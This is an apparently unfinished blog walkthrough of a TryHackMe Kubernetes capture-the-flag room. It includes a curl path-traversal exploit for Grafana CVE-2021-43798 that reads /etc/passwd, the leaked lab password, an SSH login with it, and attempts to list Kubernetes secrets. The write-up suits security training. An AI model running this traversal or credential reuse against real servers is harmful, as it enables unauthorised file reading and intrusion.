Hola, a friend of mine thought it’d be cool for me to check out this room on the THM platform since they know I’m really into Kubernetes and security. I thought it sounded like a fun idea, so I jumped right in!

Room link: https://tryhackme.com/jr/kubernetesforyouly

Okay, so I kicked things off by giving the IP address a scan, hoping to stumble upon something cool or significant. And you know what? My instincts were right on the money – I actually discovered two apps listening on ports 5000 and 3000!

• ┌──(kali㉿kali)-[~]
  └─$ nmap -F 10.10.55.59
  Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-16 11:07 EDT
  Nmap scan report for 10.10.55.59
  Host is up (0.16s latency).
  Not shown: 96 closed tcp ports (conn-refused)
  PORT     STATE SERVICE
  22/tcp   open  ssh
  111/tcp  open  rpcbind
  3000/tcp open  ppp
  5000/tcp open  upnp
  
  Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds
  

I excitedly launched my web browser and entered the “:5000”. And guess what? I came across this super fun game called “Etch A Sketch”!

However, during my search, I stumbled upon the ‘main.css’ file. To my surprise, I discovered a Pastebin link within it. Upon opening the link, I was greeted with a base32 encoded string. But you know what really caught my attention? While I was looking around, I spotted something interesting in the ‘main.css’ file. It was a Pastebin link! Curiosity piqued, I followed the link and found a base32 encoded string waiting for me. Exciting stuff!

• @import url("https://fonts.googleapis.com/css2?family=Bowlby+One+SC&display=swap");
  /* @import url("https://pastebin.com/cPs69B0y"); */
  @import url("https://fonts.googleapis.com/css2?family=Vollkorn:wght@500&display=swap");
  

After decoding the string, it revealed the word vagrant,which led us to discover the user we were searching for. Curious about the other app running on port 3000, I decided to take a closer look. It turned out to be Grafana, a monitoring tool running version 8.3. After some Googling, I stumbled upon a CVE-2021-43798 that pointed towards a Local File Inclusion (LFI) vulnerability.

https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/

• ┌──(kali㉿kali)-[~]
  └─$ curl --path-as-is 10.10.126.15:3000/public/plugins/alertmanager/../../../../../../../../etc/passwd
  root❌0:0:root:/root:/bin/ash
  bin❌1:1:bin:/bin:/sbin/nologin
  daemon❌2:2:daemon:/sbin:/sbin/nologin
  adm❌3:4:adm:/var/adm:/sbin/nologin
  lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
  sync❌5:0:sync:/sbin:/bin/sync
  shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
  halt❌7:0:halt:/sbin:/sbin/halt
  mail❌8:12:mail:/var/mail:/sbin/nologin
  news❌9:13:news:/usr/lib/news:/sbin/nologin
  uucp❌10:14:uucp:/var/spool/uucppublic:/sbin/nologin
  operator❌11:0:operator:/root:/sbin/nologin
  man❌13:15:man:/usr/man:/sbin/nologin
  postmaster❌14:12:postmaster:/var/mail:/sbin/nologin
  cron❌16:16:cron:/var/spool/cron:/sbin/nologin
  ftp❌21:21::/var/lib/ftp:/sbin/nologin
  sshd❌22:22:sshd:/dev/null:/sbin/nologin
  at❌25:25:at:/var/spool/cron/atjobs:/sbin/nologin
  squid❌31:31:Squid:/var/cache/squid:/sbin/nologin
  xfs❌33:33:X Font Server:/etc/X11/fs:/sbin/nologin
  games❌35:35:games:/usr/games:/sbin/nologin
  cyrus❌85:12::/usr/cyrus:/sbin/nologin
  vpopmail❌89:89::/var/vpopmail:/sbin/nologin
  ntp❌123:123:NTP:/var/empty:/sbin/nologin
  smmsp❌209:209:smmsp:/var/spool/mqueue:/sbin/nologin
  guest❌405💯guest:/dev/null:/sbin/nologin
  nobody❌65534:65534:nobody:/:/sbin/nologin
  grafana❌472:0:hereiamatctf907:/home/grafana:/sbin/nologin
  

And voilà! We struck gold and managed to uncover the password. lets do the SSH now!

• ┌──(kali㉿kali)-[~]
  └─$ sshpass -p hereiamatctf907 ssh -o StrictHostKeyChecking=no vagrant@10.10.126.15
  

Your Secret Crush

Here’s a little nudge in the right direction: “If you want to keep a secret, you must also hide it from yourself.” It’s like a secret within a secret, right? And hey, remember how Kubernetes lets you stash away secrets? That’s a pretty big hint! Now, hop into root mode and give this command a go to see a list of secrets. 🕵️‍♂️

• vagrant@johnny:~$ sudo ps aux | grep root
  vagrant@johnny:~$ k0s kubectl get secret
  

The connection to the server 10.0.2.15:6443 was refused - did you specify the right host or port? you can fix this by running the following commands

• sudo -i
  swapoff -a
  

[to be continued..]